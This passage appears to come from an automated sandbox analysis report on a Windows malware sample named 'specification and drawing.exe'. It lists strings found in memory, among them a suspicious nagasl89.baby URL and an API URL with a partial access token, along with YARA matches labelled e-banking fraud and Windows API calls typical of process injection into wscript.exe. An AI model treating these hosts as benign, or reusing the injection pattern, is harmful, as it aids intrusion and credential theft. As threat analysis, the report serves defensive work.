                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ix.net.ua/ru
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4592454426.0000000004BF3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nagasl89.baby
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4592454426.0000000004BF3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nagasl89.baby/w21a/
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: specification and drawing.exeString found in binary or memory: https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://companies.rbc.ru/
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://control.imena.ua/login.php?lang=2
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://control.mirohost.net/auth/login.php?lang=ru
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.imena.ua/css/media-set.css
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.imena.ua/js/bundle.min.js
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: wscript.exe, 00000008.00000003.2595734856.0000000007C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033.Z
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mail.mirohost.net
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.synd.fun&rand=
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/blog/
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/check-domain
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/check-domain?step=transfer
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/contact
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/datacenter
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/documents
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/domains
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/domains/premium-domains
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/domains/prices
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/domains/regtm
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/en
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/en/how-search
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/help
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/hosting
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/how-search
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/job
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/payments
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/ru
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/servers
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/support/domains-finance/icann-i-ee-funkcii
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/support/domains-finance/sposoby-oplaty-uslug-imena-ua
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/ua
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/vps
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/whois.php?domain=spectre.center
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.rbc.ru/technology_and_media/
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_server&
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_new&am
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_host&amp;
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.synd.fun&amp;reg_source=parking_auto
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ripe.net/

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 4.2.specification and drawing.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.specification and drawing.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4592454426.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2401176438.0000000001030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4590637504.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4590687371.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4589607610.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2402440519.0000000001E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0042CB93 NtClose,4_2_0042CB93
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102B60 NtClose,LdrInitializeThunk,4_2_01102B60
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01102DF0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01102C70
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011035C0 NtCreateMutant,LdrInitializeThunk,4_2_011035C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01104340 NtSetContextThread,4_2_01104340
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01104650 NtSuspendThread,4_2_01104650
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102B80 NtQueryInformationFile,4_2_01102B80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102BA0 NtEnumerateValueKey,4_2_01102BA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102BF0 NtAllocateVirtualMemory,4_2_01102BF0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102BE0 NtQueryValueKey,4_2_01102BE0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102AB0 NtWaitForSingleObject,4_2_01102AB0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102AD0 NtReadFile,4_2_01102AD0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102AF0 NtWriteFile,4_2_01102AF0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102D10 NtMapViewOfSection,4_2_01102D10
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102D00 NtSetInformationFile,4_2_01102D00
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102D30 NtUnmapViewOfSection,4_2_01102D30
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102DB0 NtEnumerateKey,4_2_01102DB0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102DD0 NtDelayExecution,4_2_01102DD0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102C00 NtQueryInformationProcess,4_2_01102C00
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102C60 NtCreateKey,4_2_01102C60
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102CA0 NtQueryInformationToken,4_2_01102CA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102CC0 NtQueryVirtualMemory,4_2_01102CC0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102CF0 NtOpenProcess,4_2_01102CF0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102F30 NtCreateSection,4_2_01102F30
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102F60 NtCreateProcessEx,4_2_01102F60
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102F90 NtProtectVirtualMemory,4_2_01102F90
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102FB0 NtResumeThread,4_2_01102FB0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102FA0 NtQuerySection,4_2_01102FA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102FE0 NtCreateFile,4_2_01102FE0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102E30 NtWriteVirtualMemory,4_2_01102E30
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102E80 NtReadVirtualMemory,4_2_01102E80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102EA0 NtAdjustPrivilegesToken,4_2_01102EA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102EE0 NtQueueApcThread,4_2_01102EE0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01103010 NtOpenDirectoryObject,4_2_01103010
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01103090 NtSetValueKey,4_2_01103090
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011039B0 NtGetContextThread,4_2_011039B0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01103D10 NtOpenProcessToken,4_2_01103D10
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01103D70 NtOpenThread,4_2_01103D70
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04924650 NtSuspendThread,LdrInitializeThunk,8_2_04924650
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04924340 NtSetContextThread,LdrInitializeThunk,8_2_04924340
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_04922CA0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_04922C70
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922C60 NtCreateKey,LdrInitializeThunk,8_2_04922C60
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922DD0 NtDelayExecution,LdrInitializeThunk,8_2_04922DD0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_04922DF0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922D10 NtMapViewOfSection,LdrInitializeThunk,8_2_04922D10
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_04922D30
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_04922E80
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922EE0 NtQueueApcThread,LdrInitializeThunk,8_2_04922EE0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922FB0 NtResumeThread,LdrInitializeThunk,8_2_04922FB0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922FE0 NtCreateFile,LdrInitializeThunk,8_2_04922FE0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922F30 NtCreateSection,LdrInitializeThunk,8_2_04922F30
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922AD0 NtReadFile,LdrInitializeThunk,8_2_04922AD0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922AF0 NtWriteFile,LdrInitializeThunk,8_2_04922AF0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_04922BA0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04922BF0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922BE0 NtQueryValueKey,LdrInitializeThunk,8_2_04922BE0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922B60 NtClose,LdrInitializeThunk,8_2_04922B60
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049235C0 NtCreateMutant,LdrInitializeThunk,8_2_049235C0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049239B0 NtGetContextThread,LdrInitializeThunk,8_2_049239B0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922CC0 NtQueryVirtualMemory,8_2_04922CC0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922CF0 NtOpenProcess,8_2_04922CF0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922C00 NtQueryInformationProcess,8_2_04922C00
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922DB0 NtEnumerateKey,8_2_04922DB0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922D00 NtSetInformationFile,8_2_04922D00
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922EA0 NtAdjustPrivilegesToken,8_2_04922EA0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922E30 NtWriteVirtualMemory,8_2_04922E30
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922F90 NtProtectVirtualMemory,8_2_04922F90
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922FA0 NtQuerySection,8_2_04922FA0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922F60 NtCreateProcessEx,8_2_04922F60
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922AB0 NtWaitForSingleObject,8_2_04922AB0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922B80 NtQueryInformationFile,8_2_04922B80
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04923090 NtSetValueKey,8_2_04923090
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04923010 NtOpenDirectoryObject,8_2_04923010
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04923D10 NtOpenProcessToken,8_2_04923D10
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04923D70 NtOpenThread,8_2_04923D70
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_007793C0 NtCreateFile,8_2_007793C0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00779530 NtReadFile,8_2_00779530
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00779630 NtDeleteFile,8_2_00779630
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_007796E0 NtClose,8_2_007796E0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00779850 NtAllocateVirtualMemory,8_2_00779850
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_013E43E80_2_013E43E8
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_013EE0940_2_013EE094
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_013E70510_2_013E7051
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_071D3F400_2_071D3F40
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_071D77F80_2_071D77F8
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_071D77E80_2_071D77E8
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_071DE6500_2_071DE650
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_071D94480_2_071D9448
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_071D73C00_2_071D73C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_071D3F300_2_071D3F30
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_071D6F880_2_071D6F88
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_071D8A980_2_071D8A98
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_07C5F7880_2_07C5F788
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_07C541C40_2_07C541C4
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_07C5F7780_2_07C5F778
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_07C56D310_2_07C56D31
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_07C5CAC70_2_07C5CAC7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_07C541B30_2_07C541B3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_07C500400_2_07C50040
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_07C5C8400_2_07C5C840
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 0_2_07C5C8300_2_07C5C830
